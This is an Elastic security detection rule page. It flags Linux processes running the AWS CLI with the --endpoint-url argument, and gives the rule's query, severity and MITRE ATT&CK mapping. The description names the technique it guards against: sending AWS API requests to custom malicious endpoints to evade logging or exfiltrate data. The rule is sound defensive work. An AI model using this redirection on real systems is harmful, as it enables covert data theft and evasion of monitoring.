AWS CLI Command with Custom Endpoint URL
editAWS CLI Command with Custom Endpoint URL
editDetects the use of the AWS CLI with the --endpoint-url
argument, which allows users to specify a custom endpoint URL for AWS services. This can be leveraged by adversaries to redirect API requests to non-standard or malicious endpoints, potentially bypassing typical security controls and logging mechanisms. This behavior may indicate an attempt to interact with unauthorized or compromised infrastructure, exfiltrate data, or perform other malicious activities under the guise of legitimate AWS operations.
Rule type: new_terms
Rule indices:
- logs-endpoint.events.process-*
Severity: medium
Risk score: 47
Runs every: 5m
Searches indices from: now-9m (Date Math format, see also Additional look-back time
)
Maximum alerts per execution: 100
References:
Tags:
- Data Source: Elastic Defend
- Domain: Endpoint
- OS: Linux
- Use Case: Threat Detection
- Tactic: Command and Control
Version: 1
Rule authors:
- Elastic
Rule license: Elastic License v2
Rule query
edithost.os.type: "linux" and event.category: "process" and process.name: "aws" and process.args: "--endpoint-url"
Framework: MITRE ATT&CKTM
-
Tactic:
- Name: Command and Control
- ID: TA0011
- Reference URL: https://attack.mitre.org/tactics/TA0011/
-
Technique:
- Name: Web Service
- ID: T1102
- Reference URL: https://attack.mitre.org/techniques/T1102/